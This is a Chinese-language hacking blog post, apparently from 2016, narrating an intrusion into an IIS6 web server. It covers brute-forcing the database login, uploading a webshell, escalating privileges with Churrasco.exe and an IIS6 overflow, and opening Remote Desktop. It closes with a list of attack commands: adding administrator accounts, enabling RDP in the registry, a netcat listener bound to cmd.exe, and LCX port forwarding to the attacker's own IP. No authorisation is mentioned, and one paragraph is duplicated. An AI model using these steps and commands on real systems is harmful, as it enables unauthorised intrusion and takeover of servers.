目标:
www.xxx.com
看样子应该是伪静态
后台改了,我们用工具送不出来, 那我们只能从别的地入手了
信息搜集很重要,于是我找了下服务器的信息
很明显是iis6的
是iis6 那么接下来就容易多了,为什么这么说呢 iis6的漏洞很多哦 至今为止iis6的服务器 我还没有提不下来的 只是时间问题。
好,既然知道是iis6的 那我们找下数据库把
ping了下ip 怎么ping 的 不用我多讲吧!
嗯,说实话 运气不错哦
我用默认的 root@root root@zkeys 都登陆不进去 于是乎我就去想爆破下吧 还是有几百万的密码数据哒 没想到真的搞出来了
但是又遇到难题的 路径在哪???所有爆路径的地址都无法访问 特么的 真想ddos轰下这网站;P 我不知道大家有没有仔细研究多爆路径的方法哈 其实数据库本身就给我们提供了一个大概的路径呀
在变量这
系统给出的是e:\ZkeysSoft\MySql\MySQL Server 5.0\ 那肯定不对的嘛 就算是新手 我们也有办法找到他的绝对路径呀 下载个这个 在本地安装下 就知道后面的路径 哦
e:/ZkeysSoft/phpmyadmin/phpmyadmin (经验)
拿下一句话后 准备在这个目录上传一个马儿 结果没有写入权限, 不知道什么原因。, 算了 不管他 反正有网站
找到了web目录 上传我们亲爱的webshell
既然webshell拿到了, 那么接下来 我们提权吧
拿下一句话后 准备在这个目录上传一个马儿 结果没有写入权限, 不知道什么原因。, 算了 不管他 反正有网站
找到了web目录 上传我们亲爱的webshell
既然webshell拿到了, 那么接下来 我们提权吧
组建支持 哈哈 只是天助我也 !
查可写目录 e:\recycler 就这个吧
上传cmd
日。。 好吧 去webshell执行把,
可以看到 查询账户是可以执行的 但是不能加用户
既然是iis6的 那我们可以利用iis6的溢出漏洞 传了个iis6.txt
3389 关闭了查下端口
成功拿下
附几条提权命令
mstsc /admin 运行-打开远程
systeminfo 查看系统配置
ipconfig 显示本地IP地址
netstat -a 查看端口
net start telnet 开telnet服务
net use z:127.0.0.1c$ 映射对方的C盘
net user 查看所有用户列表
net user tnthk lunge /add 添加用户tnthk密码为tnthk
net localgroup administrators lunge /add 将帐号tnthk升级为管理员
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
巴西烤肉 Churrasco.exe "命令"
使用方法:
C:\RECYCLER\Chu.exe "net user lunge lunge /add && net localgroup administrators lunge /add"
C:\RECYCLER\Chu.exe "net user admin$ /del" 删除帐号
query user 查看会话
logoff ID号 踢掉
C:\RECYCLER\Chu.exe "logoff 1"
NC反弹
路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上传
DOS界面下运行:
NC -vv www.baidu.com 80<1.txt
-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包
LCX端口转发
先本地监听51端口 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389 LCX转发
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389
注:本人原创发表于 2016-9-13 10:41:13